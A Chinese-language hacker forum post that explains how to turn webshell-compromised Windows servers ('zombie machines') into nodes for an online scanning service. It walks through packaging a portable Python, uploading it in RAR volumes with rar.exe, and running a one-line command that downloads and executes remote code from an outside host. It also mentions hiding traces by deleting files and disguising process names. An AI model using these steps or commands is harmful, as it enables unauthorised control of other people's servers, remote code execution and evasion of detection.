不知道大家都用不用www.yas*****.com，舊版是www.bug****.net。掛載各種插件，不過掃描要添加在線引擎節點。

你也可以自己電腦執行python -c "exec(__import__('urllib').urlopen('http://www.yasc****r.com/xxxxxyyyyyzzzzzz').read())" 來上線。

我這里要說的是，各位手里閑著的webshell也不少吧，何不把它們派上場？當然有人要問了，你以為每臺肉雞都有Python了？ 哈哈

好吧。這個問題我也困擾了半天，一度以為要來個自安裝版或者什么t00ls專版by iframe呢。寫了半天autoit了，才想起綠色版。

1.選個Python2.7.*的版本下載到本機執行安裝，第一步選擇Install just for me (not available on Windows Vista) （該步尤為重要！）

2.把一些幫助文檔打鉤去掉，能省就省。一頓next> finish。

3.把Python2.7文件夾打包，我這里選用winrar，因為體積很大，分卷壓縮。

rar a -m0 -v2m d:\py.rar c:\python2.7\*
4.選一個可寫的角落，上傳所有壓縮包和winrar目錄下的386K的rar.exe。

5.C:\temp\rar.exe x C:\temp\py.part01.rar c:\temp\
OK解壓完了 開工。。。

等等，什么刪除文件，更換一個有誘惑力的進程名，我這里就不多說了，當然肉雞有python就更完美了。

webshell下讓肉雞執行

c:\temp\python.exe -c "exec(__import__('urllib').urlopen('http://www.yascanner.com/xxxxxyyyyyzzzzzz').read())"

IIS APPPOOL進程該起什么進程名，大家自己琢磨吧。

進程所屬名問題，歡迎大家建議

聽說上一篇文章作者抓雞分分鐘破百，不在話下，嘖嘖，這上線，這速度。